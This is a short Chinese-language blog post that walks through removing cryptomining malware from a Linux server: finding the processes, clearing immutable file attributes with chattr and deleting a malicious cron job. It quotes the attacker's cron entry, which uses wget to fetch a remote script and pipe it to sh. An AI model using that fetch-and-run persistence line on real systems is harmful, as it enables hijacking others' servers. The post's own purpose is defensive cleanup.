黑客挖矿

遇到这种情况的话，证明你是在一个小公司里
首先使用top命令,你可以看到占用资源比较稳定，最多的，一般就是了。
有的看不出来。-------------------不好意思，当时候没有意识到要写博客，所以就没有贴图了，请理解。

1.你可以在/etc目录下找到httpdz 和initdz等文件。你删除，结果删除不了。
查询了一下，才知道它们被赋予了特殊权限。
查询命令：lsattr 文件名
然后你可以看到它的权限是-------ai---------e 。
使用命令：chattr -ai 文件名 （+是加权限，-是减权限）
然后使用命令rm -rf 文件名 就可以删除了。
注：当然，这样删除肯定是不行的。过一段时间，他还会出来，我很纳闷，因为我已经改了root密码，并改成其他用户跳转root

2.它能再次执行：（1）.说明我们没有删到根本的东西，(2)就是它肯定是配置定时了。
然后又找进程，发现在/etc/下还有别的进程那两个记得不清楚了。
删除了，以后还是过一会又重新有了，进程。没办法，只能看定时任务了。

3.查看定时任务，发现是乱码，然后命令里有 /12 * * * * wget -NfFS .cmd http:******/lll.sh .cmd |sh
大概是这样的定时任务。
很明显，他是通过这个网址下载了一个脚本。然后执行的进程。
然后crontab -e 删除命令行。（一定要注意，别删除定时任务，要和其他人员沟通好，再做决定。）
你发现删除不了定时任务，于是我猜想是crontab的命令行文件应该付了特殊权限，结果确实是。
继续用 lsattr /var/spoon/cron/root
chattr -ia /var/spoon/cron/root
然后把里边的挖矿的定时任务删除。然后再看进程就没了。
在这以后在观察一段时间，发现在cpu变得很低，内存也下降了好多。观察了很长时间也没有异常。
注意（一定要删除定时任务后，在观察进程，如果还有就删除在观察，找找其他进程）

这是自己的一个小思路，仅供参考。